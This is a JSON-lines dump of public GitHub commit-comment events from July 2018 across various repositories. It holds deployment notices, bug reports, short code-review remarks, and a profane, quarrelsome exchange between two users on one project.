{"id":"7958642696","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29690972,"position":null,"line":null,"path":null,"commit_id":"ab27d58959eb14e8620e9e2cc1c9c3a7b1826caf","created_at":"2018-07-12T20:52:13Z","updated_at":"2018-07-12T20:52:13Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-205211 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-205211\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T20:52:13Z"}
{"id":"7958644170","type":"CommitCommentEvent","actor":{"login":"Yamikamisama"},"repo":{"name":"WPO-Foundation/webpagetest"},"payload":{"comment":{"id":29690977,"position":null,"line":null,"path":null,"commit_id":"98263d8a9730885fd701954195edd7f4e66867b4","created_at":"2018-07-12T20:52:31Z","updated_at":"2018-07-12T20:52:31Z","author_association":"NONE","body":"@pmeenan  I am getting this error in my logs `Cannot read property '1' of undefined at lighthouseResultsTransfrom` from the WPT I'm trying to run, it started logging this 14 days ago which lead me to this commit.  I don't know if this change would the JSON that is returned.  do you have any insight? Or has there been a change to the Lighthouse JSON data within WPT?\r\n\r\n"}},"created_at":"2018-07-12T20:52:31Z"}
{"id":"7958646739","type":"CommitCommentEvent","actor":{"login":"jordanlkirk99"},"repo":{"name":"backstagetechnicalservices/website"},"payload":{"comment":{"id":29690981,"position":null,"line":null,"path":null,"commit_id":"7f6dae2cb1768421ec8570c2ba1f5ce74fde96af","created_at":"2018-07-12T20:53:04Z","updated_at":"2018-07-12T20:53:04Z","author_association":"MEMBER","body":"External client event email salutation changed not the accident report form."}},"created_at":"2018-07-12T20:53:04Z"}
{"id":"7958647911","type":"CommitCommentEvent","actor":{"login":"jhonnold"},"repo":{"name":"Coderinc/coder-components"},"payload":{"comment":{"id":29690984,"position":null,"line":null,"path":null,"commit_id":"0f91c8196aed6dc71319bcedb8bd639b2102a698","created_at":"2018-07-12T20:53:19Z","updated_at":"2018-07-12T20:53:19Z","author_association":"MEMBER","body":"#2 "}},"created_at":"2018-07-12T20:53:19Z"}
{"id":"7958650371","type":"CommitCommentEvent","actor":{"login":"klickverbot"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":29690990,"position":null,"line":null,"path":null,"commit_id":"4cfb47da8db493bac90feb8e60a4063a28a288e7","created_at":"2018-07-12T20:53:51Z","updated_at":"2018-07-12T20:53:51Z","author_association":"COLLABORATOR","body":"Oh, right, numpy arrays… I have been using Julia a lot lately, and their design for array types is much better – for starters, it has the huge advantage that it [doesn't violate the language specification](https://docs.python.org/3/reference/expressions.html#comparisons) (\"Comparisons yield boolean values: `True` or `False`\").\r\n\r\nEasiest fix is probably just to drop the check altogether – opinions? I could also catch `ValueError`s to work around the NumPy issue. \r\n"}},"created_at":"2018-07-12T20:53:51Z"}
{"id":"7958650535","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29690991,"position":null,"line":null,"path":null,"commit_id":"2422892914e8748c2f1345193c7e4bf5483f4543","created_at":"2018-07-12T20:53:53Z","updated_at":"2018-07-12T20:53:53Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-12T20:53:53Z"}
{"id":"7958655386","type":"CommitCommentEvent","actor":{"login":"campersau"},"repo":{"name":"aspnet/Blazor"},"payload":{"comment":{"id":29691007,"position":5,"line":39,"path":"src/Microsoft.AspNetCore.Blazor.Server/Circuits/BlazorHub.cs","commit_id":"5ec54615ad5b2b9ab4b9f090652ffc3d60f1e275","created_at":"2018-07-12T20:54:53Z","updated_at":"2018-07-12T20:54:53Z","author_association":"NONE","body":"Then the null check could also be removed?"}},"created_at":"2018-07-12T20:54:53Z"}
{"id":"7958658326","type":"CommitCommentEvent","actor":{"login":"akx"},"repo":{"name":"ajmyyra/telltale"},"payload":{"comment":{"id":29691018,"position":null,"line":null,"path":null,"commit_id":"f4a89c4f02dc88200013d6d321dbe5c3e98c1988","created_at":"2018-07-12T20:55:29Z","updated_at":"2018-07-12T20:55:29Z","author_association":"NONE","body":"Good times."}},"created_at":"2018-07-12T20:55:29Z"}
{"id":"7958661467","type":"CommitCommentEvent","actor":{"login":"AnkitGupta2020"},"repo":{"name":"Appleseed/leaves.api"},"payload":{"comment":{"id":29691022,"position":null,"line":null,"path":null,"commit_id":"e047f4b2e277fbcabf7c09e51e6c6b9ab07d852f","created_at":"2018-07-12T20:56:07Z","updated_at":"2018-07-12T20:56:07Z","author_association":"CONTRIBUTOR","body":"First Dockerization, ran on local computer, put on Docker Hub: https://hub.docker.com/u/bobrunder/. Will soon add rest apis to node.js file to complete dockerizing/version 1"}},"created_at":"2018-07-12T20:56:07Z"}
{"id":"7958665300","type":"CommitCommentEvent","actor":{"login":"iking42"},"repo":{"name":"iking42/Hello-World"},"payload":{"comment":{"id":29691027,"position":null,"line":null,"path":null,"commit_id":"95659e393fc815b7ec34d9319fa2926b8a153898","created_at":"2018-07-12T20:56:53Z","updated_at":"2018-07-12T20:56:53Z","author_association":"OWNER","body":"could not find any code"}},"created_at":"2018-07-12T20:56:53Z"}
{"id":"7958670792","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691036,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:58:04Z","updated_at":"2018-07-12T20:58:04Z","author_association":"OWNER","body":"nirai isn't a deployment mechanism lol it's a compiler"}},"created_at":"2018-07-12T20:58:04Z"}
{"id":"7958671581","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691037,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:58:13Z","updated_at":"2018-07-12T20:58:13Z","author_association":"OWNER","body":"also nirai isn't yours 😂 "}},"created_at":"2018-07-12T20:58:13Z"}
{"id":"7958673013","type":"CommitCommentEvent","actor":{"login":"iking42"},"repo":{"name":"iking42/Hello-World"},"payload":{"comment":{"id":29691039,"position":2,"line":2,"path":"README.md","commit_id":"95659e393fc815b7ec34d9319fa2926b8a153898","created_at":"2018-07-12T20:58:31Z","updated_at":"2018-07-12T20:58:31Z","author_association":"OWNER","body":" No code hear either"}},"created_at":"2018-07-12T20:58:31Z"}
{"id":"7958673148","type":"CommitCommentEvent","actor":{"login":"TangledTessellations"},"repo":{"name":"TangledTessellations/Redux-Friends"},"payload":{"comment":{"id":29691040,"position":null,"line":null,"path":null,"commit_id":"f3a26e2e2b0445c0a94d7eaa07e6c525b903eaf7","created_at":"2018-07-12T20:58:33Z","updated_at":"2018-07-12T20:58:33Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create React App and create file structure](https://trello.com/c/1PsxETfv/1-create-react-app-and-create-file-structure)"}},"created_at":"2018-07-12T20:58:33Z"}
{"id":"7958677282","type":"CommitCommentEvent","actor":{"login":"iking42"},"repo":{"name":"iking42/Hello-World"},"payload":{"comment":{"id":29691049,"position":2,"line":2,"path":"README.md","commit_id":"95659e393fc815b7ec34d9319fa2926b8a153898","created_at":"2018-07-12T20:59:25Z","updated_at":"2018-07-12T20:59:25Z","author_association":"OWNER","body":"Okay. We go fishing instead. C++ sucks anyway"}},"created_at":"2018-07-12T20:59:25Z"}
{"id":"7958677828","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691050,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:59:33Z","updated_at":"2018-07-12T20:59:33Z","author_association":"OWNER","body":"i love how you can barely read, i didn't say github, i said i have no suspensions on discord."}},"created_at":"2018-07-12T20:59:33Z"}
{"id":"7958682227","type":"CommitCommentEvent","actor":{"login":"wendellpalazzo"},"repo":{"name":"wendellpalazzo/adonis-mongoose-model"},"payload":{"comment":{"id":29691070,"position":null,"line":null,"path":null,"commit_id":"bda594b64277688fb19a9ab46c1b4fea464881e1","created_at":"2018-07-12T21:00:26Z","updated_at":"2018-07-12T21:00:26Z","author_association":"OWNER","body":"Permite criar models com conexões para vários bancos diferentes (multitenant)"}},"created_at":"2018-07-12T21:00:26Z"}
{"id":"7958684125","type":"CommitCommentEvent","actor":{"login":"Narulacodes"},"repo":{"name":"gitcowor/prixy"},"payload":{"comment":{"id":29691073,"position":4,"line":17,"path":"index.html","commit_id":"2b56c81ad614b959838b495ec0587ccc36ceed2f","created_at":"2018-07-12T21:00:48Z","updated_at":"2018-07-12T21:00:48Z","author_association":"MEMBER","body":"Fixed. Thank you. :).\r\n👍 "}},"created_at":"2018-07-12T21:00:48Z"}
{"id":"7958684892","type":"CommitCommentEvent","actor":{"login":"Narulacodes"},"repo":{"name":"gitcowor/prixy"},"payload":{"comment":{"id":29691075,"position":null,"line":null,"path":null,"commit_id":"2b56c81ad614b959838b495ec0587ccc36ceed2f","created_at":"2018-07-12T21:00:58Z","updated_at":"2018-07-12T21:00:58Z","author_association":"MEMBER","body":"Fixed Guys! THANKS TO SHEEP!"}},"created_at":"2018-07-12T21:00:58Z"}
{"id":"7958685404","type":"CommitCommentEvent","actor":{"login":"wendellpalazzo"},"repo":{"name":"wendellpalazzo/adonis-mongoose-model"},"payload":{"comment":{"id":29691079,"position":null,"line":null,"path":null,"commit_id":"8cf9930d6f7d16e58a724aae779e4519f61e12ed","created_at":"2018-07-12T21:01:04Z","updated_at":"2018-07-12T21:01:04Z","author_association":"OWNER","body":"Permite criar models com conexões para vários bancos diferentes (multitenant)"}},"created_at":"2018-07-12T21:01:04Z"}
{"id":"7958686807","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691087,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:01:21Z","updated_at":"2018-07-12T21:01:21Z","author_association":"OWNER","body":"I don't care for you OTP, that's toontown related, create an actually functioning application in panda3d then come back here."}},"created_at":"2018-07-12T21:01:21Z"}
{"id":"7958687774","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29691090,"position":null,"line":null,"path":null,"commit_id":"81f9500f5c435d893e60c7a65405e99af059e6f3","created_at":"2018-07-12T21:01:33Z","updated_at":"2018-07-12T21:01:33Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/performance-improvements-on-long-topics/30187/34\n"}},"created_at":"2018-07-12T21:01:33Z"}
{"id":"7958690396","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691098,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:02:08Z","updated_at":"2018-07-12T21:02:08Z","author_association":"NONE","body":"Did i fucking say Nirai was mine bud? Seems you can't read either... "}},"created_at":"2018-07-12T21:02:08Z"}
{"id":"7958691251","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691103,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:02:17Z","updated_at":"2018-07-12T21:02:17Z","author_association":"NONE","body":"Putting words in my mouth seems fun to you"}},"created_at":"2018-07-12T21:02:17Z"}
{"id":"7958693374","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691111,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:02:43Z","updated_at":"2018-07-12T21:02:43Z","author_association":"OWNER","body":"The context you put it in implies that 😂 \r\n"}},"created_at":"2018-07-12T21:02:43Z"}
{"id":"7958695246","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691114,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:03:09Z","updated_at":"2018-07-12T21:03:09Z","author_association":"NONE","body":"I wrote DEPLOYMENT scripts for Nirai, dumbass. (make.py, etc). Better?"}},"created_at":"2018-07-12T21:03:09Z"}
{"id":"7958697329","type":"CommitCommentEvent","actor":{"login":"hissingshark"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":29691118,"position":21,"line":79,"path":"Core/MIPS/MIPSAsm.cpp","commit_id":"8ae157e27fdf30165f657db238a89d08363305bc","created_at":"2018-07-12T21:03:34Z","updated_at":"2018-07-12T21:03:34Z","author_association":"CONTRIBUTOR","body":"> /home/osmc/ppsspp/Core/MIPS/MIPSAsm.cpp:79:18: error: request for member ‘reset’ in ‘args.ArmipsArguments::memoryFile’, which is of pointer type ‘AssemblerFile*’ (maybe you meant to use ‘->’ ?)\r\n>   args.memoryFile.reset(new PspAssemblerFile());\r\n\r\nBuilds and runs with just:\r\n`args.memoryFile = new PspAssemblerFile();`\r\nbut I imagine you're really wanting to call on some memset type method to clear it before use?  Sorry I couldn't find it.\r\n"}},"created_at":"2018-07-12T21:03:34Z"}
{"id":"7958697801","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691119,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:03:40Z","updated_at":"2018-07-12T21:03:40Z","author_association":"NONE","body":"where did i say Nirai itself was mine. Its properly of TLOPO??"}},"created_at":"2018-07-12T21:03:40Z"}
{"id":"7958698820","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29691124,"position":null,"line":null,"path":null,"commit_id":"0693e790c36e68b1b80e589c77e579ceeee3419b","created_at":"2018-07-12T21:03:53Z","updated_at":"2018-07-12T21:03:53Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-210351 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-210351\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T21:03:53Z"}
{"id":"7958699806","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691126,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:04:05Z","updated_at":"2018-07-12T21:04:05Z","author_association":"OWNER","body":"so sad. Is this all you do all day?"}},"created_at":"2018-07-12T21:04:05Z"}
{"id":"7958700146","type":"CommitCommentEvent","actor":{"login":"daviddbeasy"},"repo":{"name":"daviddbeasy/roll20-character-sheets"},"payload":{"comment":{"id":29691128,"position":null,"line":null,"path":null,"commit_id":"941b3c16547f7519d7286c19a55e3edbb4a9946a","created_at":"2018-07-12T21:04:09Z","updated_at":"2018-07-12T21:04:09Z","author_association":"OWNER","body":"Hi, Uhu79 and StuartJ. It'll be a pleassure join you both in creating a new\nversion improved!\n\nEl sáb., 7 jul. 2018 a las 9:31, uhu79 (<notifications@github.com>)\nescribió:\n\n> Hi David, StuartJ (the author of the Stylish-extension for The One Ring)\n> and myself have started the \"Fellowship of the TOR Charsheet\" and are using\n> Trello to create a fancier version of the charsheet with better fonts and\n> nicer graphics. Do you want to join us?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/daviddbeasy/roll20-character-sheets/commit/941b3c16547f7519d7286c19a55e3edbb4a9946a#commitcomment-29628828>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AZLpawanMUSoKT2ZxlehFKa7eNqMXZVnks5uEGPEgaJpZM4VGQ8I>\n> .\n>\n"}},"created_at":"2018-07-12T21:04:09Z"}
{"id":"7958700454","type":"CommitCommentEvent","actor":{"login":"ggreif"},"repo":{"name":"clash-lang/ghc-typelits-natnormalise"},"payload":{"comment":{"id":29691129,"position":null,"line":null,"path":null,"commit_id":"23949e48f1603e3c90a83974fc322935856065cb","created_at":"2018-07-12T21:04:13Z","updated_at":"2018-07-12T21:04:13Z","author_association":"CONTRIBUTOR","body":"You can add a `if (ghc >= 8.6) ghc-options: -XStarIsType` (or along these lines) to make HEAD (resp. v8.6) work with travis."}},"created_at":"2018-07-12T21:04:13Z"}
{"id":"7958702158","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691130,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:04:35Z","updated_at":"2018-07-12T21:04:35Z","author_association":"NONE","body":"Well, you can't back up my server comments? or domain"}},"created_at":"2018-07-12T21:04:35Z"}
{"id":"7958702655","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691131,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:04:42Z","updated_at":"2018-07-12T21:04:42Z","author_association":"NONE","body":"waiting for bullshit on that too"}},"created_at":"2018-07-12T21:04:42Z"}
{"id":"7958702695","type":"CommitCommentEvent","actor":{"login":"brendon"},"repo":{"name":"savef/ranked-model"},"payload":{"comment":{"id":29691132,"position":null,"line":null,"path":null,"commit_id":"7242ba6630567ce75e91bf817b583a6f3d9ffd1a","created_at":"2018-07-12T21:04:43Z","updated_at":"2018-07-12T21:04:43Z","author_association":"NONE","body":"@savef, would you be interested in proposing this fix as a PR with some tests on the main repo?"}},"created_at":"2018-07-12T21:04:43Z"}
{"id":"7958703212","type":"CommitCommentEvent","actor":{"login":"hiwayshoes"},"repo":{"name":"hiwayshoes/projectHGCE"},"payload":{"comment":{"id":29691135,"position":null,"line":null,"path":null,"commit_id":"6ec292f8a43a20a9232f0644cf52dff79a89e6ec","created_at":"2018-07-12T21:04:50Z","updated_at":"2018-07-12T21:04:50Z","author_association":"OWNER","body":"update README.md to include themes in description"}},"created_at":"2018-07-12T21:04:50Z"}
{"id":"7958704101","type":"CommitCommentEvent","actor":{"login":"Dominator56"},"repo":{"name":"Bumbleboss/bumblebot"},"payload":{"comment":{"id":29691138,"position":null,"line":null,"path":null,"commit_id":"a5463a8aa76bf134bb6b1c84d9852550c1eb0a1f","created_at":"2018-07-12T21:05:02Z","updated_at":"2018-07-12T21:05:02Z","author_association":"NONE","body":"nice file"}},"created_at":"2018-07-12T21:05:02Z"}
{"id":"7958704116","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691139,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:05:03Z","updated_at":"2018-07-12T21:05:03Z","author_association":"OWNER","body":"huh. For all i know you could've nicked your parents credit cards. "}},"created_at":"2018-07-12T21:05:03Z"}
{"id":"7958704778","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691144,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:05:12Z","updated_at":"2018-07-12T21:05:12Z","author_association":"OWNER","body":"🤷‍♂️ "}},"created_at":"2018-07-12T21:05:12Z"}
{"id":"7958707031","type":"CommitCommentEvent","actor":{"login":"twmarshall29"},"repo":{"name":"twmarshall29/bug-free-octo-succotash"},"payload":{"comment":{"id":29691150,"position":1,"line":1,"path":"README.md","commit_id":"66bb23724d426d9eef97399c17847f905a39eaa0","created_at":"2018-07-12T21:05:41Z","updated_at":"2018-07-12T21:05:41Z","author_association":"OWNER","body":"What's next"}},"created_at":"2018-07-12T21:05:41Z"}
{"id":"7958707439","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691151,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:05:47Z","updated_at":"2018-07-12T21:05:47Z","author_association":"NONE","body":"nope "}},"created_at":"2018-07-12T21:05:47Z"}
{"id":"7958708634","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691158,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:06:03Z","updated_at":"2018-07-12T21:06:03Z","author_association":"OWNER","body":"\"nope\" isn't proof. That tells me absolutely nothing."}},"created_at":"2018-07-12T21:06:03Z"}
{"id":"7958708759","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29691159,"position":null,"line":null,"path":null,"commit_id":"e226a4505935223be35049fd240a9120778b4a5b","created_at":"2018-07-12T21:06:05Z","updated_at":"2018-07-12T21:06:05Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-22](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-22).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-22-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-12T21:06:05Z"}
{"id":"7958711277","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691162,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:06:37Z","updated_at":"2018-07-12T21:06:37Z","author_association":"NONE","body":"Here: I bought the VPSes and domains with my own credit card...."}},"created_at":"2018-07-12T21:06:37Z"}
{"id":"7958712176","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691167,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:06:49Z","updated_at":"2018-07-12T21:06:49Z","author_association":"NONE","body":"Im going to go now since you cant give proof on any of my other claims.."}},"created_at":"2018-07-12T21:06:49Z"}
{"id":"7958714096","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691170,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:07:14Z","updated_at":"2018-07-12T21:07:14Z","author_association":"OWNER","body":"You're not 18 lol, you can't own a credit card."}},"created_at":"2018-07-12T21:07:14Z"}
{"id":"7958715048","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691171,"position":22,"line":24,"path":"app/Http/Controllers/ProductController.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:07:26Z","updated_at":"2018-07-12T21:07:26Z","author_association":"COLLABORATOR","body":"Utilizar neste formato:\r\n\r\n```php\r\n$data = ['produtos' => $produtos];\r\nreturn view('produto.list')->with($data);\r\n```"}},"created_at":"2018-07-12T21:07:26Z"}
{"id":"7958715379","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691173,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:07:30Z","updated_at":"2018-07-12T21:07:30Z","author_association":"NONE","body":"you would know right, as people dont lie"}},"created_at":"2018-07-12T21:07:30Z"}
{"id":"7958716151","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691175,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:07:40Z","updated_at":"2018-07-12T21:07:40Z","author_association":"NONE","body":"on the internet"}},"created_at":"2018-07-12T21:07:40Z"}
{"id":"7958717818","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691176,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:08:03Z","updated_at":"2018-07-12T21:08:03Z","author_association":"OWNER","body":"what correlation does this have to the subject."}},"created_at":"2018-07-12T21:08:03Z"}
{"id":"7958718588","type":"CommitCommentEvent","actor":{"login":"lucascolette"},"repo":{"name":"RhenryBubb/Cart_Laravel"},"payload":{"comment":{"id":29691183,"position":37,"line":38,"path":"app/Http/Controllers/ProductController.php","commit_id":"047af3794f4401d1fb518f3f1c836fdec1c99382","created_at":"2018-07-12T21:08:13Z","updated_at":"2018-07-12T21:08:13Z","author_association":"COLLABORATOR","body":"Padronizar a escrita das variáveis e funções para inglês."}},"created_at":"2018-07-12T21:08:13Z"}
{"id":"7958719020","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691184,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:08:18Z","updated_at":"2018-07-12T21:08:18Z","author_association":"NONE","body":"the fact you just said im not 18"}},"created_at":"2018-07-12T21:08:18Z"}
{"id":"7958719573","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691186,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:08:26Z","updated_at":"2018-07-12T21:08:26Z","author_association":"NONE","body":"is the subject rn"}},"created_at":"2018-07-12T21:08:26Z"}
{"id":"7958720104","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691188,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:08:33Z","updated_at":"2018-07-12T21:08:33Z","author_association":"OWNER","body":"yes, you're not 18. "}},"created_at":"2018-07-12T21:08:33Z"}
{"id":"7958720476","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29691190,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T21:08:38Z","updated_at":"2018-07-12T21:08:38Z","author_association":"NONE","body":"so it does have correlation"}},"created_at":"2018-07-12T21:08:38Z"}
{"id":"7958720729","type":"CommitCommentEvent","actor":{"login":"michi88"},"repo":{"name":"dj-stripe/dj-stripe"},"payload":{"comment":{"id":29691191,"position":16,"line":177,"path":"djstripe/fields.py","commit_id":"6a6f048a3a432a3ba40fba8bf90f8789139daec4","created_at":"2018-07-12T21:08:42Z","updated_at":"2018-07-12T21:08:42Z","author_association":"CONTRIBUTOR","body":"Not python 2 compatible!"}},"created_at":"2018-07-12T21:08:42Z"}
